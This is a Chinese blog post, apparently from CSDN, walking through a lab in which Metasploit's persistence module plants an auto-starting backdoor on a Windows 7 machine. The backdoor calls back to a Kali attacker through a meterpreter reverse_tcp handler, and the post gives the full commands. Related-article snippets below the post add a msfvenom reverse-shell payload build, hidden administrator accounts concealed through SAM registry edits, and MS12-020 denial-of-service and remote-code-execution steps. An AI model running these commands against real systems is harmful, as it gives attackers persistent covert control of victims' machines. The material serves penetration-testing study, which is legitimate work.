MSF之Persistence后门

最新推荐文章于 2023-06-20 11:44:20 发布
最新推荐文章于 2023-06-20 11:44:20 发布
阅读量2.6k 收藏 14
点赞数 3
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46104215/article/details/120503799
版权

Persistence:一款使用安装自动方式的持久性后门程序,可以利用它创建注册和文件

一、实验环境

攻击主机:2021 Kali        (ip:192.168.110.130)

靶机:win7(专业版)     (ip:192.168.110.134)

准备:先通过攻击获取一个 meterpreter shell(之前的文章中有介绍的 ms17-010漏洞)

二、实验步骤

1.获得 meterpreter shell 之后,输入 run persistence -A -S -U -i 5 -p 4444 -r 192.168.110.130

命令语法:

A:自动启动Payload程序

S:系统登录时自动加载

U:用户登录时自动启动

X:开机时自动加载

i:回连的时间间隔

P:监听反向连接端口号

r:目标机器 IP 地址(攻击主机)

 2.执行结束后,可以获得persistence后门,同时会创建一个新的会话,然后将攻击主机(kali)重启

3.kali输入 use exploit/multi/handler(监听模块,非常重要)

 > set payload windows/meterpreter/reverse_tcp

> set LHOST 192.168.110.130

> set LPORT 4444(端口要和上面的persistence后门端口一致)

4.运行成功,获得meterpreter shell

 

橙汁水
关注
  • 3
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
钓鱼网站+persistence植入后门程序+创建用户
小王的储物间
02-21 795
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。同时每个成长路线对应的板块都有配套的视频提供:当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
项目管理利刃之MSF
03-03
火龙果软件工程技术中心 MSF,MicrosoftSolutionFramework,微软解决方案框架是一个在预算范围内按期创建一个业务解决方案需要一种经过检验的方法。本文将结合MSF在项目管理中的实际应用进行讲解,如果您是软件项目...
MSFpersistence权限维持
大方子
10-18 2458
首先,我们先生成一个 PAYLOAD :  msfpayload(msfvenom) windows/meterpreter/reverse_tcp LHOST=192.168.2.133 LPORT=1218 X >xx.exe 接着,我们来配置一个反弹会话的监听处理: use exploit/multi/handler set payload windows/meterp...
12.3、后渗透测试--持久化后门
无痕的博客
12-13 2195
metasploit后渗透测试--持久化后门
Kali Linux 秘籍 第七章 权限提升
热门推荐
龙哥盟
10-05 4万+
第七章 权限提升 作者:Willie L. Pritchett, David De Smet 译者:飞龙 协议:CC BY-NC-SA 4.0 简介我们已经获得了想要攻击的计算机的权限。于是将权限尽可能提升就非常重要。通常,我们能访问较低权限的用户账户(计算机用户),但是,我们的目标账户可能是管理员账户。这一章中我们会探索几种提升权限的方式。7.1 使用模拟令牌这个秘籍中,我
MSF后渗透模块Meterpreter
LainWith的博客
01-27 4281
目录后门persistencemetsvc图形界面getgui信息收集判断目标是不是虚拟机arp主机发现nmap主机发现dumplink-最近访问的文件记录enum_applications-安装的软件收集补丁信息键盘记录抓包浏览器系统口令kiwi内网渗透开启远程桌面添加路由445端口扫描哈希值传递攻击-psexecPortfwd端口转发域信息收集密码喷射令牌窃取痕迹清理 后门 由于 Meterpreter是仅仅驻留在内存中的 Shellcode,一旦目标主机重启,将失去这台机器的控制权,如果管理员将利用的
msf windows版
09-22
msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版
kali 渗透msf
11-14
kali渗透测试利器
MSF后渗透持续后门
分享学习网络的点点滴滴
01-11 728
○ 利用漏洞取得的meterpreter shell运行于内存中,重启失效○ 重复exploit漏洞可能造成服务崩溃○ 持久后门保证漏洞修复后仍可远程控制。
msfpersistence无法正常
最新发布
2301_78637386的博客
06-20 709
直接使用run persistence -h。如果使用全局地址的话,什么反应也没有。请求大神,能否帮我解释一下。
windows权限维持的方法
小小猪的博客
01-04 5931
windows权限维持的方法 影子账户: 使用如下命令创建隐藏用户并加入管理员组 net user test$ 123456 /add net localgroup administrators test$ /add 创建成功后使用net user命令无法查看到此用户,但是在计算机管理页面中还是可以看到,需要通过修改注册表来隐藏 打开注册表(HKEY_LOCAL_MACHINE\SAM\SAM),修改SAM权限,赋予adminitrators完全控制权限 重启之后,将Administr.
内网权限维持
wuxinweii的博客
11-10 2793
攻击者在提升权限后,往往会通过建立后门来维持对目标主机的控制权。这样一来,即使修复了被攻击者利用的系统漏洞,攻击者还是可以通过后门继续控制目标系统 一、粘贴键后门 windows 系统下连续按 5 次 shift 可调出其程序,粘滞键是为了那些按钮有困难的人设计的,就是按键困难,那么如果用 ctrl+c,ctrl+v 这种快捷键或者其他需要组合的键时,就会有困难,不具备一次按两个或多个键的能力,那么此时就可以单按 5 下 shift 键来启动粘滞键功能。 所以我们可以通过更改注册表的命令来进行后门维持 在命
Msfvenom建立后门程序指令及开启监听
Dreamsi_zhang的博客
08-13 7515
一、场景介绍
msfconsole学习
幻心的博客
07-05 2779
工具: Quasar-win AhMyth-andriod
MSF生成后门木马
一醉一休的博客
11-19 2412
为了方便平时使用,记录一下操作命令
MSF自动化浏览器攻击与后门安装
自学编程_youkewang.top
02-26 4491
0x01:自动化浏览器攻击介绍: browser_autopwn是Metasploit提供的辅助功能模块。在用户访问Web页面时,它会自动攻击受害者的浏览器。在开始攻击之前,browser_autopwn能够检测用户使用的浏览器类型, browser_autopwn将根据浏览器的检测结果,自行部署最合适的exploit。   0x02:首先进入metasploit,然后搜索该模块,如图1-
windows操作系统常见持久性后门
weixin_42282189的博客
10-14 2562
windows操作系统常见持久性后门 0x00 简介 ​ 当我们拿到域中最高权限之后,就需要将自己的权限进行巩固,进行权限持久化操作。 0x01 隐藏账户 1.1 测试系统 win 7 1.2 新建特殊账户 在目标主机cmd中输入以下命令,创建一个名为whoami$的隐藏账户,并把该隐藏账户设置为管理员权限 net user whoami$ howe7 /add net localgroup administrators whoami$ /add ​ 注:创建的用户名必须以$符
关于metasploit的木马免杀,维持权限以及进程迁移
m0_46682482的博客
07-22 2309
hi,大家好,我是铁汉fhoenix。这里我为各位总结一下msf的免杀,维持以及进程迁移。 1.在目标运行M马,取得shell以后。可以先查询进程然后进行注入,这里我们用最简单的方法。直接输入run post/windows/manage/migrate 模块注入它会自动寻找合适的进程注入,并且自动迁移进程。 2.通过msf自带的persistence模块可以设置启动项来进行维持。下面我来解释一下,拿到shell以后输入run persistence -P windows/x64/mete.
msf之ms12-020的复现
05-24
MS12-020是远程桌面协议(RDP)中的一个漏洞,它可以允许攻击者通过发送恶意的RDP数据包来执行远程代码。MSF(Metasploit框架)是一个开源的漏洞利用工具,可以用来测试和利用此漏洞。 以下是利用MS12-020漏洞的步骤: 1. 首先,需要使用Metasploit框架。如果你还没有安装它,请先到官网下载并安装。 2. 打开Metasploit框架控制台,输入以下命令: ``` use auxiliary/scanner/rdp/ms12_020_check ``` 这个命令将会检查目标是否存在MS12-020漏洞。 3. 如果目标存在漏洞,可以使用以下命令进行攻击: ``` use auxiliary/dos/windows/rdp/ms12_020_maxchannelids set RHOSTS <target IP address> exploit ``` 这个命令将会执行一个拒绝服务攻击,导致目标系统崩溃。这个攻击不会导致目标系统被入侵或数据被窃取,但是可以影响系统的可用性。 4. 如果你想要执行更危险的攻击,可以使用以下命令: ``` use exploit/windows/rdp/ms12_020_maxchannelids set RHOSTS <target IP address> set PAYLOAD windows/meterpreter/reverse_tcp set LHOST <attacker IP address> exploit ``` 这个命令将会执行一个远程代码执行攻击,使用Meterpreter反向Shell连接到目标系统。这个攻击可以让攻击者完全控制目标系统,包括执行任意命令、窃取数据等。 需要注意的是,利用漏洞进行攻击是非法的,只能在授权的环境下进行测试。同时,这个漏洞已经被修复,建议尽快更新你的系统以避免被攻击。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值